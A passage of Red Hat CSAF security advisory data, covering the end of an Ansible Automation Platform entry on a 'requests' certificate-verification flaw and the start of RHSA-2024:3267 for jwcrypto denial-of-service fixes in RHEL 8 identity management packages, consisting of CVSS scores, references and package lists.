"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "requests: subsequent requests to the same host ignore cert verification"
}
]
}
rhsa-2024:3267
Vulnerability from csaf_redhat
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for the idm:DL1 and idm:client modules is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments. \n\nSecurity Fix(es):\n\n* JWCrypto: denail of service Via specifically crafted JWE (CVE-2023-6681)\n\n* python-jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:3267",
"url": "https://access.redhat.com/errata/RHSA-2024:3267"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2260843",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260843"
},
{
"category": "external",
"summary": "2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "RHEL-28842",
"url": "https://issues.redhat.com/browse/RHEL-28842"
},
{
"category": "external",
"summary": "RHEL-29908",
"url": "https://issues.redhat.com/browse/RHEL-29908"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_3267.json"
}
],
"title": "Red Hat Security Advisory: idm:DL1 and idm:client security update",
"tracking": {
"current_release_date": "2025-09-25T13:10:24+00:00",
"generator": {
"date": "2025-09-25T13:10:24+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.8"
}
},
"id": "RHSA-2024:3267",
"initial_release_date": "2024-05-22T11:47:22+00:00",
"revision_history": [
{
"date": "2024-05-22T11:47:22+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-05-22T11:47:22+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-09-25T13:10:24+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 8)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:8::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"product": {
"name": "ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm (idm:client)",
"product_id": "ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=src\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"product": {
"name": "ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm (idm:client)",
"product_id": "ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck@0.12-3.module%2Bel8.9.0%2B19692%2Bfac39a03?arch=src\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"product": {
"name": "python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm (idm:client)",
"product_id": "python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=src\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"product": {
"name": "python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm (idm:client)",
"product_id": "python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-qrcode@5.1-12.module%2Bel8.9.0%2B18920%2B2223d05e?arch=src\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"product": {
"name": "python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm (idm:client)",
"product_id": "python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=src\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"product": {
"name": "pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm (idm:client)",
"product_id": "pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=src\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product": {
"name": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1)",
"product_id": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/custodia@0.6.0-3.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"product": {
"name": "ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm (idm:DL1)",
"product_id": "ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"product": {
"name": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm (idm:DL1)",
"product_id": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck@0.12-3.module%2Bel8.9.0%2B19634%2Bc162f948?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1)",
"product_id": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"product": {
"name": "python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm (idm:DL1)",
"product_id": "python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product": {
"name": "python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1)",
"product_id": "python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-kdcproxy@0.4-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product": {
"name": "python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1)",
"product_id": "python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-qrcode@5.1-12.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product": {
"name": "python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1)",
"product_id": "python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product": {
"name": "pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1)",
"product_id": "pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"product": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm (idm:DL1)",
"product_id": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1)",
"product_id": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client)",
"product_id": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client)",
"product_id": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client)",
"product_id": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client)",
"product_id": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client)",
"product_id": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client)",
"product_id": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
